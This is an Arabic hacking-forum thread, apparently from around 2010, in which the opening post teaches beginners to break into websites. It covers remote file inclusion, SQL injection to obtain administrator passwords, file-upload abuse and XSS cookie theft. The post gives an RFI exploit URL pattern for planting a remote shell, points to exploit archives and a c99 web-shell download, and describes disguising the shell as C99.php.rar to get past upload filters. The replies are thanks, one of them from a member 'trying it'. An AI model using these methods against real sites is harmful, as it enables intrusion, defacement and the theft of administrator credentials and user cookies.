اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ

((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 17

الموضوع: ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ

  1. #1
    هكر مجتهد Array الصورة الرمزية عطر الكون
    تاريخ التسجيل
    Dec 2009
    الدولة
    رحــاله
    المشاركات
    313

    Hasri ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ



    السلام عليكم ورحمة الله وبركاته

    الثغرات :
    شرح تفصيلي للاخو المبتدئين
    نشالله الجميع بستفاد منه وانا متأكد رح يستفادوا بس بده شوية تدقيق وانتبه على كل خطوة اوك


    تابــــــــــــــــــــــ ــــــــــــــــــــــع




    (( الثغرات عبارة عن اخطاء يقع فيها مصمم البرنامج او سكربت معين ... ومن خلال هذه الاخطاء يجد الهكر
    منافذ لدخول الى المواقع .. والوصول الى السيرفر ))
    * البرامج يقصد بها السكربتات الموجوده فى مواقع معينه على سبيل المثال .. المنتدى عبارة عن سكربت ...
    او سكربت الصور .... او سكربت مكتبه البرامج
    Powered by vBulletin Version = يدل على سكربت المنتدى ... وهكذا


    انواع الثغرات : الثغرات تنقسم الى عنده انواع كثيرة ولكن سوف ناخذ بعض من هذه الثغرات وسوف نشرحها


    1 - ثغرات الفايل انكلود (( Remote File Inclusion Vulnerability ))
    يقصد بهذا النوع من الثغرات ... ان المصمم وقع فى خط برمجى وهذا الخطء يسمح لى رابط ملف خارجى بالموقع
    وطبعا الملف الخارجي يكون ( الشل = اداه اختراق )


    2 - ثغرات قواعد البيانات (( Remote SQL Injection Vulnerability )) ويقصد بها الثغرات التى تتح لنا
    معرفة معلومات لمجموعه معنية // علي سبيل المثال معرفه اسم الدخول وكلمة المرور لمدير الموقع


    3 - ثغرات الرفع (( Remote File Uploed )) ويقصد بها الثغرات التى تستطيع من خلالها رفع ملف على الموقع
    مثل ثغرات مراكز التحميل


    4 - ثغرات (( Cross-Site Scripting )) وهى XXS ويقصد بها الثغرات التى تستطيع من خلالها بسحب كوكيز اعضاء الموقع عبر كود معين ... مثال على ثغرات ( الثغرات الهوتميل )


    5 - ثغرات File Disclosure وهى الثغرات الى تستطيع من خلالها قرائة اى ملف على الموقع وهى تقريبا
    نفس ثغرات الفايل انكلود
    6 - ثغرات Command Execution وهى كذلك مشابه لثغرات الفايل انكلود ولكن الاختلاف انك تكتب اوامر لينكس
    على المتصفح بعد الاستغلال


    تقريباا هذه اشهر الثغرات المعروفه فى المواقع كما ان هناك ثغرات غير هذه مثل ثغرات Perl وثغرات البفر
    والزيور داي 0-day .... الخ


    * شرح التفصلي لثغرات ...
    1 - ثغرة الفايل انكلود ... طبعا نحن قلنا ان هذا النوع من الثغرات تسمح لى رابط ملف خارجى بالموقع بو اسطة متغير
    معين وطبعا الملف الخارجي يكون ( الشل = اداه اختراق )


    على سبيل المثال ... عندى موقع www.XXXXXX.com/vb/ مصاب بثغرة فايل فى سكربت المنتدى الى هو VB
    والخط على صفحة faq.php والمتغير الى يسمح لى بربط الشل هو shoot3r
    فان الثغرة والاستغلال يكون بهذا الشكل ...
    /ww.XXXXXX.com/vb/faq.php?shoot3r=youshell.txt?cmd



    تذكر ان ثغرات الانكلود تتكون من ( السكربت المصاب / مكان المجلد / الصفحة التى يوجد بها المتغير الى يسمح بربط الشل )


    http://www.xxxx.com/Folder/pag.php?i...=youshell.txt?
    الموقع = www.xxx.com
    مجلد السكربت = Folder
    الصفحة التى فيها المتغير الى يسمح لنا بجلب ملف خارجى = pag.php
    المتغير الى نربط به الملف الخارجى ( الشل ) incloud
    علامة =
    الشل بصغية تكتس = youshell.txt
    وعلامة ؟


    وكذا نحن الان عرفنا كيفية التعامل مع الثغرات الفايل انكلود .. ولكن انا اعتقد انه الحين فى سؤال يدور فى ذهن المبدئين



    وهو .. كيف اعرف ثغرات الانكلود ... او كيف اعرف الاستغلال لثغرة ...

    راح نقولك يا اخى العزيز .. انه فى مواقع سيكورتى خاصة تعرض لك اخر الثغرات المكتشفة بالاضافة الى طريقة الاستغلال



    من هذه المواقع milw0rm - exploits : vulnerabilities : videos : papers : shellcode وكذلك SecurityFocus



    طيب ناخذ مثال من المواقع السيكورتى ... http://milw0rm.org/***apps.php ونبحث عن الثغرات الفايل الانكلود
    هذا مثال على الثغرة syndeoCMS 2.5.01 (cmsdir) Remote File Inclusion Vulnerability










    وهذا شيل c99
    MEGAUPLOAD - The leading online storage and file delivery service


    النوع الثاني من الثغرات
    ثغرات قواعد البيانات (( Remote SQL Injection Vulnerability )) ويقصد بها الثغرات التى تتح لنا معرفة معلومات لمجموعه معنية // علي سبيل المثال معرفه اسم الدخول وكلمة المرور لمدير الموقع
    وتعرف هذا الثغرة باسم SQL واستعملها سهل جداا .. تضع الاستغلال على المتصفح الانترنيت اكسلبور .. وتلاحظ الباس
    وغالبا يكون الباس مشفر MD5 وهناك الكثير من المواقع الى تفك التشفير ...


    ناخذ مثال على هذا النوع Softbiz Link Directory Script Remote SQL Injection Vulnerability






    النوع الثالث ثغرات الرفع ( ثغرات مراكز التحميل ) وهى تقريبا اسهل انواع الثغرات .. فقط تقوم برفع الشل
    شاهد معى الصورة يقول لك ادارج الملف ثم اضغط على الابلود بمعنى رفع ... وغلبااا نحتاج الى خداع المركز
    فى الامتداد بحث يكون ا متداد الشل الى نسخدمه هكذا C99.php.rar







    مع خالص تحياتي



  2. #2
    هكر مبتديء Array
    تاريخ التسجيل
    Feb 2010
    المشاركات
    7

    افتراضي رد: ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ

    يعطيك العافيه صراحه شرح جميل


  3. #3
    هكر مبتديء Array الصورة الرمزية ~ second life ~
    تاريخ التسجيل
    Jan 2010
    المشاركات
    17

    افتراضي رد: ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ

    أبداااع صراحهـ .. { عطر الكون } ..

    شرح واضح ..

    تقبلي مروري ..ّ!



  4. #4
    هكر مجتهد Array الصورة الرمزية sasouki_xXx
    تاريخ التسجيل
    Jan 2010
    الدولة
    تونس
    المشاركات
    261

    افتراضي رد: ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ

    مشكوووووور والله يعطيك الف عافيه


  5. #5
    هكر مبتديء Array
    تاريخ التسجيل
    Mar 2010
    المشاركات
    18

    افتراضي رد: ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ

    مشكووور والله لو احترفته ما انفع بيع الا الاسلام


  6. #6
    هكر مبتديء Array
    تاريخ التسجيل
    Mar 2010
    المشاركات
    18

    افتراضي رد: ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ

    جديدك يا مااااااااان بقى



  7. #7
    هكر مبتديء Array الصورة الرمزية m!iṧṧ ṧǿṧǿ
    تاريخ التسجيل
    Mar 2010
    المشاركات
    24

    افتراضي رد: ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ

    روعا
    مشكورا =(


  8. #8
    هكر مبتديء Array
    تاريخ التسجيل
    May 2010
    المشاركات
    10

    افتراضي رد: ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ

    Mersiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii


  9. #9
    هكر مبتديء Array
    تاريخ التسجيل
    Apr 2010
    المشاركات
    29

    افتراضي رد: ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ

    جار التجربه



  10. #10
    هكر مبتديء Array
    تاريخ التسجيل
    Nov 2009
    المشاركات
    19

    افتراضي رد: ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ

    يعطيك العافية


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. شرح استغلال ثغرات remote file include
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 89
    آخر مشاركة: 05-11-2012, 05:32 PM
  2. شرح استغلال ثغرات Remote File Disclosure
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الثغرات
    مشاركات: 9
    آخر مشاركة: 03-16-2012, 10:15 PM
  3. رفع الشيل عبر ثغرات remote file include
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 45
    آخر مشاركة: 03-16-2012, 10:13 PM
  4. شرح استغلال ثغرات remote file disclousure
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 22
    آخر مشاركة: 08-31-2011, 08:25 AM

وجد الزوار هذه الصفحة بالبحث عن:

ثغرات رفع شيل

ثغرة رفع شل

اسهل ثغرة لرفع الشل

ثغرة رفع شيل

شرح رفع شل c99

أسهل ثغرة لرفع الشل

ثغرة رفع شل 2013

ثغرة 4images 1.7.8

اسهل طريقة رفع الشل

كيفيه رقع ثغره ‏sql

اشهر ثغرات المواقع

كيفية رفع الشيل

استغلال ثغرة لرفع الملفات

اسهل ثغرة لاختراق المواقع و رفع الشل

طريقة رفع شيل c99 على منتدى

طريقه استغلال الثغرات بالمواقع ورفع الشيل

ثغرة لرفع الشيل

ﺍﺳﻬﻞ ﺛﻐﺮﺍﺕ ﻣﻊ الاستغلال

شرح ثغرة رفع شل

رفع شيل من ثغرة sql

شرح رفع شيل c99

استغلال ثغرة لرفع الشل

طريقة استغلال الثغرات c99

رفع الشل بأحدث طرق

رفع شل من خلال منتديات ( vBulletin ) ::اسهل الطرق

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •